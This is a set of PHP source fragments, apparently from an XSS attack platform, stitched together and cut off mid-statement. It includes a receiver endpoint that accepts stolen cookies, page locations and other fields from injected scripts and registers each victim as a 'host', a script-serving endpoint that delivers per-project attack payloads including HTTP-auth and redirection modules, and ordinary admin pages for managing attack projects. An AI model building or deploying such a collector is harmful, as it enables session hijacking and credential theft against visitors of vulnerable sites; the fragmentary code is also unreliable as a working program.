$current_url = get_url(); $URI = substr($current_url, strlen(PMX_SITEURL), strlen($current_url) - strlen(PMX_SITEURL)); $uri = explode('/', $URI); $saltid = substr($uri[2], 0, 8); // 项目字符串ID if (count($uri) < 4) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } if (strlen($uri[3]) != 50) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } $sid = $uri[3]; // XSS漏洞页字符串ID $pmxProj = new pmxProject(); $pmxHost = new pmxHost(); if ($pmxProj->isExistSaltID($saltid) == FALSE) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } $pid = $pmxProj->getIDbySlatID($saltid); /** * 判断是否第一次上线 */ if ($pmxHost->isExistSaltID($sid) == FALSE) { $pmxHost->addHost($pid, $sid); // 添加主机 } else { $pmxHost->updateHost($sid); // 更新主机信息
<?php /** Prevent user from loading inc. file */ define("PMX_ENTRANCE", true); require dirname(__FILE__) . '/public-init.php'; header("Access-Control-Allow-Origin:*"); header('Content-Type: text/json; charset=utf-8'); $current_url = get_url(); $URI = substr($current_url, strlen(PMX_SITEURL), strlen($current_url) - strlen(PMX_SITEURL)); $uri = explode('/', $URI); $saltid = substr($uri[2], 0, 8); $pmxProj = new pmxProject(); if ($pmxProj->isExistSaltID($saltid) == FALSE) { exit; } $id = $pmxProj->getIDbySlatID($saltid); $detail = $pmxProj->getDetail($id); if ($detail['status'] == 0) { exit; } $request_data = isset($_REQUEST) ? $_REQUEST : array(); $location = isset($_REQUEST["location"]) ? $_REQUEST["location"] : ""; $toplocation = isset($_REQUEST["toplocation"]) ? $_REQUEST["toplocation"] : ""; $cookies = isset($_REQUEST["cookies"]) ? $_REQUEST["cookies"] : ""; if (isset($request_data["location"])) { unset($request_data["location"]); } if (isset($request_data["toplocation"])) { unset($request_data["toplocation"]); } if (isset($request_data["cookies"])) {
} } else { if (isset($_POST["mod_" . $modid_item . "_" . $var])) { $val = $_POST["mod_" . $modid_item . "_" . $var]; $modconfig[] = array($modid_item, $var, $val); } } } } } /** * 校验输入信息是否完整和正确 */ if ($title == "" || !in_array($status, $allow_optionStatus) || !in_array($protect, $allow_optionProtect) || !in_array($mailAlert, $allow_optionMail)) { die("Error: Something you input is invalid."); } $pmxProj = new pmxProject($title, $desc, $status, $protect, $mailAlert, $mail, $comments, $modid, $modconfig); /** * 项目名是否重复 */ if ($pmxProj->isExistName($title) == TRUE) { die("Error: Duplicate project name."); } /** * 添加项目 */ if ($pmxProj->addProj() == TRUE) { echo "Success: You have added project \"" . esc_html($title) . "\" successful"; } else { echo "Error: Sorry. We are fail to add the project \"" . esc_html($title) . "\"."; }
<?php /** * 启动项目 */ if (!defined("PMX_ENTRANCE")) { header("HTTP/1.0 404 Not Found"); exit; } header('Content-Type: text/html; charset=utf-8'); if (!pmx_validate_token()) { die("Error: Token is incorrect."); } $id = isset($_GET["id"]) ? intval($_GET["id"]) : NULL; $pmxProj = new pmxProject(); if (!$pmxProj->isExistID($id)) { die("Error: The project id is non-existent."); } if ($pmxProj->startProj($id)) { echo "Success: You have started the project {$id} successful."; }
<?php if (!defined("PMX_ENTRANCE")) { header("HTTP/1.0 404 Not Found"); exit; } pmx_require_header("Edit Project"); pmx_require_nav(""); $id = isset($_GET["id"]) ? intval($_GET["id"]) : NULL; $pmxProj = new pmxProject(); if (!$pmxProj->isExistID($id)) { die("Error: The Project id is non-existent."); } $data = $pmxProj->getDetail($id); $modids = json_decode($data['mods'], true); ?> <div class="main"> <div class="main-item-single main-item-add-proj pull-left"> <form class="form-horizontal" id="form-add-proj" action="<?php echo pmx_getactionurl_saveproj(); ?> " method="POST" role="form"> <div class="main-item-single-left main-item-single-addproj-setting pull-left"> <div class="add-proj-item add-proj-item-1"> <div class="form-group"> <label for="inputTitle" class="col-sm-2 control-label">Title</label> <div class="col-sm-9"> <input type="text" name="title" class="form-control"
<?php /** Prevent user from loading inc. file */ define("PMX_ENTRANCE", true); require dirname(__FILE__) . '/public-init.php'; $current_url = get_url(); $URI = substr($current_url, strlen(PMX_SITEURL), strlen($current_url) - strlen(PMX_SITEURL)); if (substr($URI, 0, 1) !== '/') { $URI = '/' . $URI; } $uri = explode('/', $URI); $saltid = substr($uri[2], 0, 8); $pmxProj = new pmxProject(); if ($pmxProj->isExistSaltID($saltid) == FALSE) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } $id = $pmxProj->getIDbySlatID($saltid); $detail = $pmxProj->getDetail($id); $mods = json_decode($detail['mods'], true); if ($detail['status'] == 0) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } $code = $pmxProj->getCode($id); if (count($mods) == 1 && strpos($code, "{pmx.system.module.")) { // 判断是否为系统模块 $mod_httpauth_id = 34; $mod_srcredirection_id = 31; $mod_config = $pmxProj->getConfig($id); if (strpos($code, "{pmx.system.module.httpauth}")) {
foreach ($modid as $modid_item) { if (isset($_POST["mod_" . $modid_item])) { $var = $_POST["mod_" . $modid_item]; if (is_array($var)) { foreach ($var as $var_item) { if (isset($_POST["mod_" . $modid_item . "_" . $var_item])) { $val = $_POST["mod_" . $modid_item . "_" . $var_item]; $modconfig[] = array($modid_item, $var_item, $val); } } } else { if (isset($_POST["mod_" . $modid_item . "_" . $var])) { $val = $_POST["mod_" . $modid_item . "_" . $var]; $modconfig[] = array($modid_item, $var, $val); } } } } } if ($id == "" || $title == "" || !in_array($status, $allow_optionStatus) || !in_array($protect, $allow_optionProtect) || !in_array($mailAlert, $allow_optionMail)) { die("Error: Something you input is invalid."); } $pmxProj = new pmxProject($title, $desc, $status, $protect, $mailAlert, $mail, $comments, $modid, $modconfig); if ($pmxProj->isExistID($id) == FALSE) { die("Error: Project id is invalid."); } if ($pmxProj->updateProj($id) == TRUE) { echo "Success: You have updated project \"" . esc_html($title) . "\" successful"; } else { echo "Error: Sorry. We are fail to update the project \"" . esc_html($title) . "\"."; }
<?php /** * 删除项目 */ if (!defined("PMX_ENTRANCE")) { header("HTTP/1.0 404 Not Found"); exit; } header('Content-Type: text/html; charset=utf-8'); if (!pmx_validate_token()) { die("Error: Token is incorrect."); } $id = isset($_GET["id"]) ? intval($_GET["id"]) : NULL; $pmxProj = new pmxProject(); if (!$pmxProj->isExistID($id)) { die("Error: The project id is non-existent."); } if ($pmxProj->delProj($id)) { echo "Success: You have deleted the project {$id} successful."; }